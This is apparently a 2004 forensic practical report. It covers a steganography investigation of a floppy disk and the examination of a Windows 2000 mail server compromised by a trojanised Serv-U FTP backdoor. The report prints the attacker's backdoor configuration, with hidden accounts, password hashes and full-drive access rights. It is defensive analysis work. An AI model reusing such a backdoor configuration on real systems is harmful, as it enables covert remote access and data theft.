25102:	A2	D6
25103:	06	8F
25104:	76	BD
25105:	DC	0C
49196:	7F	6A
49200:	0A	34
49201:	17	A9
49202:	13	EF
49203:	E0	1C

49732:	20	76
49733:	20	F0
49734:	20	09
49735:	20	56

10 difference(s) found.

In the third test, the original files were used again but with a different • password (testpassword). There were 18 differences found between the files mainly at 3 consecutive Offsets. Running the camouflage operation a second time, with the same password, again resulted in changes, therefore a random, element was being introduced into the 'encryption'.

1. A:\host2.doc: {	50,007 bytes	1. A:\hos	st4.do	c: 50,007 bytes	1. A:\hos	st5.doc: 50	,007 bytes
2. A:\host3.doc:	50,007 bytes	007 bytes 2. A:\host3.doc: 50,007 bytes		2. A:\host3.doc: 50,007 bytes		,007 bytes	
Offsets: decimal		Offsets:	decim	nal	Offsets:	decimal	
25098: 6A	7C				25098:	7F	7C
25102: D6	8A				25102:	44	8A
25103: 8F	24				25103:	1A	24
25104: BD	78				25104:	75	78
25105: 0C	01				25105:	CD	01
49196: 6A	7C	49196:	7D	7C	49196:	7F	7C
49200: 34	7A	49200:	8E	7A	49200:	6C	7A
49201: A9	4D	49201:	9C	4D	49201:	DF	4D
49202: EF	AC	49202:	3B	AC	49202:	C5	AC
49203: 1C	04	49203:	BB	04	49203:	D0	04
49736: 20	7C	5 differe	nce(s	) found.	10 differ	ence(s) fo	und.
49737: 20	C7						
49738: 20	67						
49739: 20	92						
49740: 20	96						

49742: 20 49743: 20 01 18 difference(s) found.

A0

CD

49741: 20

In the fourth test different files were used and interestingly the results • show that whilst the first four offset locations are different, from the other sets, the second and third offset locations are the same despite a slightly different file size. The first file had no password set, whilst the second had the password 'test'.

1. A:\host22.doc: 50,007 bytes 2. A:\host23.doc: 50,007 bytes Offsets: decimal 24590: B4 02 D0 24591: E7

24592:	98	9C		
24593:	7D	8E		
49200:	3C	62		
49201:	B4	99		
49202:	F4	93		
49203:	81	9B		
49732:	20	76		
49733:	20	F0		
49734:	20	09		
49735:	20	56		
12 difference(s) found.				

• The results from these tests would tend to indicate that the encryption used by camouflage utilises the in-built MS Windows cryptographic provider and a variable seed value. The likelihood of breaking the encryption, due to poor implementation or using brute force, was therefore considered small.

## Identification of Camshell.dll found on the floppy

To confirm that the part of the Camshell.dll file found on the floppy disk was the same as the file of the same name forming part of the camouflage program the following comparison was performed:

- As the copy of the file on the floppy had be partially overwritten, the data from Offset 4096 to the end of the file was cut out using WinHex and saved as a separate file 'floppy.dat.
- The same data, from Offset 4096 to the end of the file, was cut from the copy of Camshell.dll downloaded with the Camouflage install. This was saved as 'original.dat'.
- The MD5 of both files was then compared using MD5sum, with the following results. This confirmed that the remains of the file named Camshell.dll on the floppy was exactly the same file as that downloaded as part of the Camouflage install.

MD5sums: Generating		
File	MI	)5 Hash
🔵 floppy.dat	b4	3fb827cc49fl5llf73ac3f08fffa5b
🔵 original.dat	b4	3fb827cc49f1511f73ac3f08fffa5b
Key Unprocessed OK / Done Processing Error (0 so far) O Sec	Batch (2 of 2): 100% File: <u>100%</u> <u>S</u> ave <u>C</u> lose	File Information Path: J:\EnCase\Cases\SANS_GIAC_Fore Name: original.dat Size: 32.00 Kb

#### Examination of the three suspect files

The following three files were transferred to the VMW are session and examined using WinHex:

#### • Internal\_Lab\_Security\_Policy.doc

This file was an MS Word 10 document, based on a Normal template.

From Offset 32256 they appeared to be a small section of encrypted text ending at Offset 32642.

Running uncamouflage against this file with a blank password revealed an embedded file 'Opportunity.txt' containing the text:

I am willing to provide you with more information for a price. I have included a sample of our Client Authorized Table database. I have also provided you with our latest schematics not yet available. They are available as we discussed - "First Name".

My price is 5 million.

Robert J. Leszczynski

#### • Password\_Policy.doc

This file was an MS Word 10 document, based on a Normal template.

From Offset 39936 they appeared to be a section of encrypted text ending at Offset 306637.

Running uncamouflage against this file with a blank password was not successful, as the program claimed that either the password was wrong, or the file was not camouflaged.

#### Remote\_Access\_Policy.doc

This file was an MS Word 10 document, based on a Normal template.

From Offset 30720 they appeared to be a section of encrypted text ending at Offset 215106.

Running uncamouflage against this file with a blank password was not successful, as the program claimed that either the password was wrong, or the file was not camouflaged. Given the reference to first names in the camouflaged file, the following names were tried as passwords against the other two files. These names did not appear to be the password to the other two files. The name could be that of the recipient and therefore unknown to the investigator at this time. The next logical step would be to try the first name of all known Rift, Inc employees as the password.

- Robert
- robert
- ROBERT
- John
- john
- JOHN

#### Conclusions and recommendations to Investigator

The following conclusions are made as the result of the examination of the floppy disk recovered from Robert John Leszczynski, Jr:

- The floppy disk was formatted on a Linux/UNIX system, rather than a MS Windows system. The Volume Boot Sector of the floppy contained the initials "RJL" in the floppy name.
- There was a deleted and partially overwritten file on the floppy called "Camshell.dll". Examination of this file revealed that it was part of a toolset, called Camouflage" used to hide one file inside another.
- The camouflage toolset must be installed on a MS Windows system and its component parts are detailed in the body of the report. When used the toolset writes useful information to the registry concerning each camouflage operation.
- There were 6 MS Word files on the floppy, three of which attracted attention as their physical and logical file sizes differed, and on examination appeared to contain encrypted information.
- The Camouflage toolset, with a blank password, was used to unencrypt the file "Internal\_Lab\_Security\_Policy.doc" and reveal a hidden file 'Opportunity.txt' containing the text:

I am willing to provide you with more information for a price. I have included a sample of our Client Authorized Table database. I have also provided you with our latest schematics not yet available. They are available as we discussed - "First Name".

My price is 5 million.

#### Robert J. Leszczynski

- The other two suspect files could not be unencrypted with a blank password or derivatives of Leszczynski's first name.
- Most of the files on the floppy were last accessed on the 26/04/04 and appear to have been originally created 3 or 4 days before that. This may suggest that if the files were created on a PC and copied to the floppy, they may still be present on the PC, and if deleted, probably have not yet been overwritten.
- Robert Leszczynski has obviously violated company policy by removing the floppy from the R&D lab.

It is recommended that:

- There is sufficient evidence to suspend Robert Leszczynski and deny him both logical and physical access to any Ballard Industry premises.
- All MS Windows systems in the R&D lab, or laptops issued to Leszczynski should be examined for the presence of the Camouflage toolset. Any found to contain the program should be subjected to forensic analysis.
- All floppy disks in the R&D lab should be examined for the presence of files containing encrypted information.
- All electronic external access point logs, firewalls, proxy servers, and Leszczynski's PC should be examined for any presence of the camouflage toolset or attempts to access <u>http://www.camouflage.unfiction.com</u> or <u>http://www.camfoulage.freeserve.co.uk</u>.
- Audit logs from the systems holding the 'Client Authorised Table Database' and the 'latest schematics' should be examined in an effort to confirm that Leszczynski had access to this material.
- A list of all first names from known Rift Inc employees should be tried against the remaining two camouflaged files in an attempt to obtain access to the encrypted information within.
- Consideration should be given to involving the judicial authorities at this stage.

#### Task Comments:

I would not consider this investigation complete, if anything its really only just starting and considerably more work would need to be down before it could be decided which laws could have been broken. There is obviously the violation of the company policy not to remove floppies from the R&D lab, and this should be sufficient to suspect Leszczynski whilst investigations continue.

In terms of UK computer misuse offences, these would come under the

#### Computer Misuse Act 1990

(<u>http://www.hmso.gov.uk/acts/acts1990/Ukpga 19900018 en 2.htm#mdiv2</u>) . Again, I do not consider the investigation complete and further information would be needed to prove an offence, but the following could be considered:

#### Section 1 - Unauthorised access to computer material:

(1) A person is guilty of an offence if

- a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;
- b) the access he intends to secure is unauthorised; and
- c) he knows at the time when he causes the computer to perform the function that that is the case.

(2) The intent a person has to have to commit an offence under this section need not be directed at

- a) any particular program or data;
- b) a program or data of any particular kind; or
- c) a program or data held in any particular computer

The Act interprets 'Secures Access' as:

A person secures access to any program or data held in a computer if by causing a computer to perform any function he

- a) alters or erases the program or data;
- b) copies or moves it to any storage medium other than that in which it is held or to a different location in the storage medium in which it is held;
- c) uses it; or
- d) has it output from the computer in which it is held (whether by having it displayed or in any other manner);

and references to access to a program or data (and to an intent to secure such access) shall be read accordingly.

The Act interprets 'Access' as:

Access of any kind by any person to any program or data held in a computer is unauthorised if

- a) he is not himself entitled to control access of the kind in question to the program or data; and
- b) he does not have consent to access by him of the kind in question to the program or data from any person who is so entitled.

Obviously to prove this you would need to establish that Leszczynski's access to the systems holding the data he was trying to sell was unauthorised or possibly that his particular access to the PC on which camouflage was installed was unauthorised in that he was breaking company policy by either installing the software or operating it. If an offence

under Section 1 can be proved, then:

# Section 2 - Unauthorised access with intent to commit or facilitate commission of further offences.

(1) A person is guilty of an offence under this section if he commits an offence under section 1 above ("the unauthorised access offence") with intent

- a) to commit an offence to which this section applies; or
- b) to facilitate the commission of such an offence (whether by himself or by any other person);

and the offence he intends to commit or facilitate is referred to below in this section as the further offence.

(2) This section applies to offences

- a) for which the sentence is fixed by law; or
- b) for which a person of twenty-one years of age or over (not previously convicted) may be sentenced to imprisonment for a term of five years (or, in England and Wales, might be so sentenced but for the restrictions imposed by section 33 of the [1980 c.43.] Magistrates' Courts Act 1980).

(3) It is immaterial for the purposes of this section whether the further offence is to be committed on the same occasion as the unauthorised access offence or on any future occasion.

(4) A person may be guilty of an offence under this section even though the facts are such that the commission of the further offence is impossible.

## Part 2 – Option 1 – Compromised Server

Note: The system name, specific details, and IP Addresses have been changed in order to anonymize the incident.

## Introduction

On 21 May 2004 system administrator reported that he suspected that a MS Windows 2000 system had been compromised in that he had discovered what appeared to be an FTP Server operating on the system that he could not account for. He had disabled the service and then shut the system down. This paper covers the analysis of the systems hard disk. It does not cover those steps in the surrounding investigation.

## System Concerned

The system concerned was a HP LPr running MS Windows 2000 Server and operating as an MS Exchange Front End Server, providing services across the Internet. The system was located on a network in private address space, protected from the Internet by a firewall.

The system had two hard disks operating as a mirrored pair.

## Hardware

The HP LPr was a 3U rack mounted server with a single floppy disk and CD-ROM drive, together with two hot swap SCSI disks. The primary system disk was identified for forensic examination and labelled, following imaging, as follows:

HP SCSI H/D Model: DDYS-T18350
18.2GB 10K Ultra 3 SCSI Drive
P/N: 07N4612
S/N: 5EFS9623
Removed from HP LPr S/N: 2369537
System Name: XXXX01

The hard disk details and evidence number were entered in the investigation register.

## Disk Image

The system hard disk was imaged using Encase (version 4.18a) as follows:

- 1. The disk to be used for the evidence material was wiped using EnCase 'Wipe Disk' command and then formatted.
- 2. A new case was opened in EnCase 'Mail Server XXX01'
- 3. Case options were set, including default directories and date and time formats.
- 4. An EnCase boot CD-ROM was used to boot the System XXXX01. During the BIOS stage of the boot it was interrupted to confirm that the system would boot

onto the CR-ROM rather than onto the hard disk. This was the configured setting.

- 5. Once the system had booted into the DOS based graphical menu and the auto detect network card option selected, EnCase for DOS was started. Disk 0 was selected and Encase Network acquisition mode configured. The system displayed the 'Waiting to connect' message. Acquiring the media in this manner ensures that EnCase cannot write to the evidential hard disk. A crossover network cable attached this system to the forensic workstation.
- 6. From the forensic workstation, having previously given the interface in use a fixed IP address, the Add Device option was selected followed by the Network Crossover option. The disk was given an evidence number (00104582). Once the initial preview was complete, the Encase 'Acquire' option was selected and the acquisition set to replace the source device. Search, Hash and Signature Analysis were not selected at this stage. The File Segment size set to 1536MB (to permit easier subsequent burning onto DVD). The option to generate an image hash was selected at this time.
- 7. Once imaging was complete at 16:10 on 21 May the Acquisition Hash was recorded from the screen and witnessed by the two people present as:

709DA50F3B09E32DE7FFF90D285E0322

8. The Encase case was saved at this time. Subsequently the four evidential files, along with the Encase case file were burnt onto 4 \* DVD labelled 'Case Mail Server XXX01-00104582.E01-E04'. These DVD's, along with Disk0 from the server, identified above, were sealed in tamper evident bags whose details where entered into the evidence register. They were not subsequently accessed.

## Media Analysis

The first step to media analysis was to run the Encase 'Initialise Case' script to collect basic system information. The following was obtained:

## Disk Details

Device Evidence Number: File Path: Examiner Name: Actual Date: Target Date: Total Size: Total Size: Total Sectors: File Integrity:	00104582 J:\EnCase\Cases\SANS J Hayday 21/05/04 16:10:10 21/05/04 16:10:10 18,210,037,760 bytes ( 35,566,480 Completely Verified, 0		nce Files\XXXX01.E01	
EnCase Version:	4.18a			
System Version:	Windows XP			
Acquisition Hash: Verify Hash:	709DA50F3B09E32DE7FFF90D285E0322 709DA50F3B09E32DE7FFF90D285E0322			
Partitions		- / /		
Code Type 07 NTFS	Start Sector 0	<b>Total Sectors</b> 35,551,845	<b>Size</b> 17GB	
Volume File System: Sectors per cluster: Total Sectors: Total Clusters:	NTFS 8 35,551,782 4,443,972	Drive Type: Bytes per sector: Total Capacity: Unallocated:	Fixed 512 18,202,509,312 bytes (17GB) 13,819,392,000 bytes (12.9GB)	
Free Clusters:	3,373,875	Allocated:	4,383,117,312 bytes (4.1GB)	

Volume Name: Driver Information:	NTFS 3.1 Chkdsk 0	Volume Offset:	63

## System Information

InstallDate:	16/01/03 16:24:09
ProductName:	Microsoft Windows 2000
RegisteredOrganization:	XXXX
RegisteredOwner:	XXXX
CurrentVersion:	5.0
CurrentBuildNumber:	2195
CSDVersion:	Service Pack 4
SystemRoot:	C:\WINNT
SourcePath:	D:\I386
PathName:	C:\WINNT
ProductId:	51876-270-7341983-05850

## **Network Information**

IPAddress: 10.6.4.119 SubnetMask: 255.255.255.0 DefaultGateway: NameServer: DhcpIPAddress: DhcpSubnetMask: DhcpServer: The computer account name is "XXXX01" The primary domain name is "XXXX01Domain"

IPAddress: 10.6.3.19 SubnetMask: 255.255.255.0 DefaultGateway: 10.6.3.1 NameServer: X.X.X.X DhcpIPAddress: DhcpSubnetMask: DhcpServer: The computer account name is "XXXX01" The primary domain name is "XXXX01Domain"

#### Users

User name: Best1\_User Full Name: Best1 User Account Description: Home Drive Letter: Home Directory: Primary Group Number: 513 Security Identifier: Logon Script: Profile Path: Last Logon: Unknown Date: Last Password Change: Last Incorrect Password Logon Attempt: 09/05/04 00:27:30

User name: Full Name: Account Description: Home Drive Letter: Home Directory: Primary Group Number: Security Identifier: Logon Script: Profile Path:

PATROL for Performance account

S-1-5-21-294287356-539585668-161572361-1004

01/01/70 00:00:00 01/01/70 00:00:00 08/10/03 10:04:17

sweeper esweeper

513 S-1-5-21-294287356-539585668-161572361-1001 
 Last Logon:
 01/01/70 00:00:00

 Unknown Date:
 01/01/70 00:00:00

 Last Password Change:
 18/05/04 15:53:26

 Last Incorrect Password Logon Attempt:
 09/05/04 01:00:57

User name: Guest Full Name: Account Description: Built-in account for guest access to the computer/domain Home Drive Letter: Home Directory: Primary Group Number: 513 Security Identifier: S-1-0-0-0-0-0-0 Logon Script: Profile Path: Last Logon: 01/01/70 00:00:00 Unknown Date: 01/01/70 00:00:00 Last Password Change: 01/01/70 00:00:00 Last Incorrect Password Logon Attempt: 14/05/04 20:13:27

User name: Fred Full Name: Built-in account for administering the computer/domain Account Description: Home Drive Letter: Home Directory: Primary Group Number: 513 Security Identifier: S-1-5-21-294287356-539585668-161572361-500 Logon Script: Profile Path: 26/09/03 16:09:01 Last Logon: Unknown Date: 01/01/70 00:00:00 Last Password Change: 24/01/03 11:18:33 Last Incorrect Password Logon Attempt: 08/05/04 09:17:08

PatrolService User name: Full Name: PatrolService Account Description: Monitoring User Home Drive Letter: Home Directory: Primary Group Number: 513 Security Identifier: S-1-5-21-294287356-539585668-161572361-1003 Logon Script: Profile Path: Last Logon: 21/05/04 14:52:33 01/01/70 00:00:00 Unknown Date: Last Password Change: 08/10/03 09:40:00 Last Incorrect Password Logon Attempt: 08/05/04 09:58:37

User name: John Full Name: John Account Description: Home Drive Letter: Home Directory: Primary Group Number: 513 Security Identifier: S-1-5-21-294287356-539585668-161572361-1002 Logon Script: Profile Path: Last Logon: 21/05/04 14:46:23 Unknown Date: 01/01/70 00:00:00 Last Password Change: 22/05/03 14:45:34 Last Incorrect Password Logon Attempt: 13/05/04 10:06:52

#### Services

Whilst going through the list of services on the system (taken from the registry) the following was discovered:

Serv-U

Type: 16 Startup Type: Disabled (This appears to be the FTP Server the administrator disabled) ErrorControl: 1 Path to executable: C:\WINNT\system32\temped\ServUDaemon.exe DisplayName: Serv-U FTP Server ObjectName: LocalSystem Description: Provides FTP services and allows remote FTP clients to connect to this computer

#### svchs

Type: 16 Startup Type: Automatic ErrorControl: 1 Path to executable: C:\WINNT\system32\spool\prtprocs\rpc\svchs.exe DisplayName: System Log ObjectName: LocalSystem Description: Logs system messages (This is not a standard Windows 2000 Service)

All other services identified could be accounted for.

### **Further Scripts**

Next the Encase script 'Windows Event Log Parser was run. This brings all event log information into the Encase Bookmark area for review. Whilst not all logs are examined at this stage it is obvious that the Security Log was cleared on 2 August 2002 and that it has not been logging events since this time.

#### File Report

The Encase File Report was run to produce a report showing every file on the system, along with its file size and MAC times.

### Searching

Next the following searches were run against the system:

#### Hash Sets

Next Hash file analysis was run against the image using the following Hash sets. This is to check if file checksums match known good checksums for those files.

- Hackers Toolkit CD
- Windows 2000 Server

#### File Signatures

The complete Encase file signature library was run against the image. This is used to confirm that file extensions match the file types claimed by the extension.

#### **Keyword Searching**

Keyword searching for the term 'ftp' was run with multiple hits returned, some in unallocated clusters. These results will be examined later in the examination.

## ServU FTP Service

Now we have some basic system information, we start to look at the Serv U FTP Service. The path to the service is listed as:

C:\WINNT\system32\temped\ServUDaemon.exe

This is somewhat unusual as you would not expect to find executables in this directory. Examination of the directory revealed:

Name	Logical Size	Physical Size	Hash Valu	e		
ServUDaemon.ini	1,096	4,096	58d1dda0a1584565e9769808f9c0f464			
ServUStartUpLog.txt	588	588	4cbd430e20ca53a6142ed2485c9c5c34			
ServUDaemon.exe	496,836	499,712	392f38ab5dde57bf360a5f015a85a2ea			
secsas.exe	2,048	4,096	fb8e76d66a	a2a2845cb4613eb96	Se3ecd7	
wx1.exe	544,514	544,768	7d8282cf0	5f0f9cfcd6bb7bbb02	7f056	
		,				
					?	
Name	Last Accesse			ast Written	Entry Modified	
ServUDaemon.ini	08/05/2004			08/05/2004 11:12	20/05/2004 11:05	
ServUStartUpLog.txt	08/05/2004	11:12 08/05/200	4 10:03	08/05/2004 11:12	20/05/2004 11:05	
ServUDaemon.exe	08/05/2004	10:03 08/05/200	4 09:09	12/09/2002 21:47	20/05/2004 11:05	
secsas.exe	08/05/2004	09:08 08/05/200	4 09:08	08/05/2004 09:08	20/05/2004 11:05	
wx1.exe	08/05/2004	09:08 08/05/200	4 09:07	08/05/2004 09:08	20/05/2004 11:05	
Name:	ServUDaem	on ini				
File Ext:	ini	011.111				
File Type:	Initialization					
File Category:	Windows					
Signature: Description:	Match File, Archive					
Last Accessed:	08/05/04 11:	12:00				
File Created:	08/05/04 09:	09:00				
Last Written:	08/05/04 11:					
Entry Modified: Logical Size:	20/05/04 11: 1,096	05:42				
Physical Size:	4,096					
Starting Extent:	0C-C167954	1				
File Extents:	1					
Permissions: Physical Location:	• 6,879,432,19	12				
Evidence File:	Disk from XX					
File Identifier:	24220					
Hash Value:		584565e9769808f9c				
Full Path: Short Name:	SERVUD~1.		XXX01\C\WI	NN I \system32\temp	ed\ServUDaemon.ini	
File Extents	SERVOD 1.					
Start Sector	Sectors	Start Cluster	Clusters			
13,436,391	8	1,679,541	1			
Permissions						
Name:	Adminis	trators				
ld:	S-1-5-3	2-544				
Property:	Allow					
Permissions:		1] [R&X] [R] [W] [Sy	ncj			
ld:	S-1-5-1	8				
Property:	Allow		_			
Permissions:	[FC] [N	1] [R&X] [R] [W] [Sy	nc]			
Name:	Users					
ld:	S-1-5-3	2-545				
Property:	Allow					
Permissions:	[R&X]	R] [Sync]				

Name: Id:		dministrators	
Property:	S-1-5-32-544 Owner		
r toperty.	0		
ld:	S	-1-5-18	
Property:	G	roup	
Name:	ServU	StartUpLog.txt	
File Ext:	txt		
File Type:	Text		
File Category:	Docum	ient	
Signature:	Match	anda la m	
Description: Last Accessed:	File, Archive		
File Created:	08/05/04 11:12:00 08/05/04 10:03:16		
Last Written:		04 11:12:00	
Entry Modified:	20/05/0	04 11:05:42	
Logical Size:	588		
Physical Size:	588		
Starting Extent: File Extents:	0C-C6 <sup>2</sup>	113,416	
Permissions:	•		
Physical Location:	25.073	568	
Evidence File:	,	om XXXX01	
File Identifier:	24390		
Hash Value:		30e20ca53a6142ed2485	
Full Path:			XXXX01\C\WINNT\system32\temped\ServUStartUpLog.txt
Short Name: File Extents	SERVU	JS~1.TXT	
Start Sector	Sectors	Start Cluster	Clusters
48,971	2	6,113	
		-,	
Permissions			
Name:		dministrators	
ld:	5-	-1-5-32-544	
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	[F		Sync]
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Permissions: Id: Property: Permissions: Name: Id: Property: Permissions: Name: Id: Property: Id: Property: Id: Property: Id: Property: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size:	[[ S- Al [] US S- Al [] Al S- Al [] [] Al S- S- O S- C O S- S- C O S- C O S- S- C O S- S- C O S- S- C O S- S- C S- C	FC] [M] [R&X] [R] [W] [\$ -1-5-18 llow FC] [M] [R&X] [R] [W] [\$ sers -1-5-32-545 llow R&X] [R] [Sync] dministrators -1-5-32-544 wner -1-5-18 roup <b>Daemon.exe</b> ws Executable Executable Executable rchive 04 10:03:15 04 09:09:00 02 21:47:02 04 11:05:42 6 2	
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File Identifier: 24234 Hash Value: 392f38ab5dde57bf360a5f015a85a2ea Full Path: Mail Server XXXX01\Disk from XXXX01\C\WINNT\system32\temped\ServUDaemon.exe Short Name: SERVUD~1.EXE File Extents Start Sector Sectors Start Cluster Clusters 13,606,983 976 1,700,865 122 Permissions Administrators Name: S-1-5-32-544 Id. Property: Allow Permissions: [FC] [M] [R&X] [R] [W] [Sync] S-1-5-18 ld: Property: Allow Permissions: [FC] [M] [R&X] [R] [W] [Sync] Users Name: ld: S-1-5-32-545 Property: Allow Permissions: [R&X] [R] [Sync] Administrators Name: ld: S-1-5-32-544 Property: Owner ld: S-1-5-18 Property: Group Name: secsas.exe File Ext: exe File Type: Windows Executable Code\Executable File Category: Signature: Match File, Read Only, Archive Description: Last Accessed: 08/05/04 09:08:34 08/05/04 09:08:34 File Created: Last Written: 08/05/04 09:08:34 Entry Modified: 20/05/04 11:05:42 Logical Size: 2,048 Physical Size: 4,096 Starting Extent: 0C-C1679525 File Extents: Permissions: Physical Location: 6,879,366,656 Evidence File: Disk from XXXX01 File Identifier: 24133 fb8e76d66a2a2845cb4613eb96e3ecd7 Hash Value: Full Path: Mail Server XXXX01\Disk from XXXX01\C\WINNT\system32\temped\secsas.exe File Extents Start Sector Sectors Start Cluster Clusters 13,436,263 8 1,679,525 1 Permissions Name: Administrators S-1-5-32-544 ld: Property: Allow Permissions: [FC] [M] [R&X] [R] [W] [Sync] ld: S-1-5-18 Allow Property: [FC] [M] [R&X] [R] [W] [Sync] Permissions: Name: Users ld: S-1-5-32-545 Property: Allow [R&X] [R] [Sync] Permissions: Name: Administrators S-1-5-32-544 ld: Property: Owner

ld:		S-1-5-18		
Property:		Group		
Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified:	Code Mato File, 08/0 08/0 08/0 20/0	Action of the second se		
Logical Size: Physical Size:	,544 544			
Starting Extent: File Extents:	0C-0 10	21676590		
Permissions: Physical Location:	• 6,86	7,344,896		
Evidence File: File Identifier:	Disk 2413	from XXXX01		
Hash Value:	=	2 282cf05f0f9cfcd6bb7bbl	b027f056	
Full Path:	Mail	Server XXXX01\Disk fro	om XXXX01\C\WINNT\	system32\temped\wx1.exe
File Extents Start Sector	Sectors	Start Cluster	Clusters	
13,412,783 6,966,559 13,394,783 13,608,871 13,457,743 13,414,495 9,657,831 9,797,015 9,869,479 9,976,911	8 128 128 128 128 128 128 136 120 128 32	1,676,590 870,812 1,674,340 1,701,101 1,682,210 1,676,804 1,207,221 1,224,619 1,233,677 1,247,106	1 16 16 16 16 16 17 15 16 4	
Permissions Name: Id: Property: Permissions:		Administrators S-1-5-32-544 Allow [FC] [M] [R&X] [R] [W	] [Sync]	
ld: Property: Permissions:		S-1-5-18 Allow [FC] [M] [R&X] [R] [W	] [Sync]	
Name: ld: Property: Permissions:		Users S-1-5-32-545 Allow [R&X] [R] [Sync]		
Name: Id: Property:		Administrators S-1-5-32-544 Owner		
ld: Property:		S-1-5-18 Group		

#### **Registry Analysis**

Analysis of the "CurrentControl\Services" section of the registry indicates that the Serv-U services entry was last written on19 May at 12:55.

Name:	Serv-U
File Type:	2000000
Description:	Folder, Registry Entry
Last Written:	19/05/04 12:55:42
Logical Size:	6
Physical Size:	6

Starting Extent: File Extents: Physical Location: Evidence File:	0NTRegistry-C6017,192 1 3,080,896 Disk from XXX01			
Full Path:	Mail Server XXXX01\Disk from XXX01\C\WINNT\system32\config\system\NTRegistry\\$\$\$PROTO.HIV\ControlSet001\Serv ices\Serv-U			
File Extents				
Start Sector	Sectors	Start Cluster	Clusters	
6,017	1	6,017	1	

The "Security" settings on the same registry key was last written on 8 May at 09:09. This time corresponds with the time that the "ServUDaemon.exe file was created.

Name: File Type:	<b>Securit</b> 200000			
Description:		Registry Entry		
Last Written:	08/05/0	4 09:09:13		
Logical Size:	8			
Physical Size:	8			
Starting Extent:	0NTReg	gistry-C6018,80		
File Extents:	1			
Physical Location:	3,081,2	96		
Evidence File:	Disk from XXXX01			
Full Path:	Mail Server XXXX01\Disk from			
	XXXX0	1\C\WINNT\system32\cc	onfig\system\NTRegistry\\$\$\$PROTO.HIV\ControlSet001\Se	
	rvices\S	Serv-U\Security		
File Extents		•		
Start Sector	Sectors	Start Cluster	Clusters	
6,018	1	6,018	1	

On extracting the five files from the image to the Export directory for later examination, the ServUDaemon.exe file was immediately reported by the AVG anti-virus running on the forensic system as Trojan Horse Backdoor.Servu. AVG does not provide any detailed information on the Trojan, but the following was discovered on a web search:

McAfee http://vil.nai.com/vil/content/v 99802.htm

Trojan Name: Backdoor-ZH

*Type:* Remote Access

**Trojan Characteristics:** This detection covers a popular FTP server daemon in certain packed formats. The Serv-U FTP daemon is a popular commercial FTP server. However, it has been used in many root kits and other malware for malicious purposes. BackDoor-ZH covers such misuse of this application.

*Trojan Symptoms:* Firewall traffic - Listening TCP Port 43958. Presence of RPCMON.DLL & RPCMON.VXD

**Method of Infection:** Varies. This remote access trojan is often dropped by other executables or self-extracting archives. Once the FTP server is running, a remote attacker can perform various file system functions.

#### Aliases:

Backdoor.ServU-based (AVP) Backdoor.ServU.B (Central Command) Troj/Vicwor-A (Sophos)

#### Sophos http://www.sophos.com/virusinfo/analyses/trojvicwora.html

Sophos give very little information of the Trojan except to say that it is a password stealing Trojan.

Further Internet searches revealed that there are large numbers of Trojans etc making use of hacked versions of ServU FTP. Searches for secsas.exe and wx1.exe produced no hits.

The file ServUStartUpLog.txt was examined next. It revealed:

Sat 08May04 10:03:16 - Serv-U FTP Server v3.0 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved by Rob Beckers Sat 08May04 10:03:16 - Cat Soft is an affiliate of Rhino Software, Inc. Sat 08May04 10:03:16 - Using WinSock 2.0 - max. 32767 sockets Sat 08May04 10:03:16 - Starting FTP Server... Sat 08May04 10:03:17 - FTP Server listening on port number **261**, IP 10.6.4.119, 10.6.3.19, 127.0.0.1 Sat 08May04 10:03:17 - FTP Server listening on port number **43958**, IP 127.0.0.1 Sat 08May04 10:03:17 - Valid registration key found Sat 08May04 11:12:00 - FTP server going down...

The file ServUDaemon.ini was examined next. It revealed:

[GLOBAL]

Version=3.0.0.17

 $\label{eq:registrationKey} RegistrationKey=UEyz459 waBR4IVRklkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3 wbymil1VkKjgdAeIPDKSWM5doXJsgW64YlyPdo+wAGnUBuycB$ 

OpenFilesUploadMode=Shared

PacketTimeOut=300

[DOMAINS]

Domain1=0.0.0.0||261|wx|1|0

[Domain1]

#### SignOn=c:\recycler\SIGNIN.TXT

LogSystemMes=0

LogSecurityMes=0

LogGETs=0

LogPUTs=0

LogFileSystemMes=0

LogFileSecurityMes=0

LogFileGETs=0

LogFilePUTs=0

User1=0|1|0

User2=wrinex|1|0

User3=upload|1|0

[USER=wrinex|1]

Password=zqADD015FB510DD8FEA029D466B6A8229F

HomeDir=c:\recycler\yeah\wrinex

RelPaths=1

MaxUsersLoginPerIP=1

TimeOut=60

MaxNrUsers=10 Access1=d:\recycler\yeah|RALP Access2=c:\recycler\yeah\wrinex|RALP [USER=o|1] Password=tp5AD000E294036A0D60C230BC167329E6 HomeDir=c:\ TimeOut=600 Maintenance=System Access1=f:\|RWAMELCDP Access2=h:\|RWAMELCDP Access3=q:\|RWAMELCDP Access4=e:\|RWAMELCDP Access5=d:\|RWAMELCDP Access6=c:\|RWAMELCDP [USER=upload|1] Password=clF35CFFFD551BCA9DA965521478A39B6B HomeDir=c:\recycler\yeah RelPaths=1 TimeOut=600 Access1=c:\|RWAMELCDP Access2=c:\recycler|RWAMELCDP [EXTERNAL]

- The references to the recycler were noted for future examination.
- The file wx1.exe was examined next. It revealed:
  - It was a compiled Windows32 executable with references to ServUDaemion.ini encoded within it.
  - It contains at least one reference to 'GETPASSWORD'.

This file was earmarked for further examination in a sandbox.

- The file secsas.exe was examined next. It revealed:
  - It was a compiled Windows 32 executable with references in it to:

 http://www.elimination-project.com/dcl

 Comment to: MaXxX @Hotmail.com

 lcq: 52733081

 File Created @ 27 April 2004 by MaXxX

 MS04-011 Quick Patch

 RestrictAnonymous···System\CurrentControlSet\Control\LSA

 RegSetValueExA··q·RegOpenKeyA·[·RegCloseKey·^.RegCreateKey

 A·ADVAPI32.dll·· ·printf··MSVCRT.dll

This file appears to be something to do with patching the vulnerability identified in MS04-011. Again this was marked for
further examination.

• The file ServUDaemon.exe was examined next. It was a compiled Windows 32 executable which had no obvious strings visible within it.

#### http://www.elimination-project.com/

A search for <u>www.elimination-project.com</u> revealed that the domain name had expired on 24/09/2004. A search for 'elimination-project revealed nothing of interest.

#### MaXxX @Hotmail.com

A search for <u>MaXxX</u> <u>@Hotmail.com</u> revealed several references on securityfocus concerning a 'SecureDCOM.exe:

This file simply sets the Registry Key: HKLM\Software\Microsoft\Ole\EnableDCOM = N	
and then prints out the text:	I
Comment to: MaXxX Hotmail com	I
File Created @ 28 July 2003 by MaXxX	I
Dcom Quick Patch	I
	I
[	]

#### MS04-011

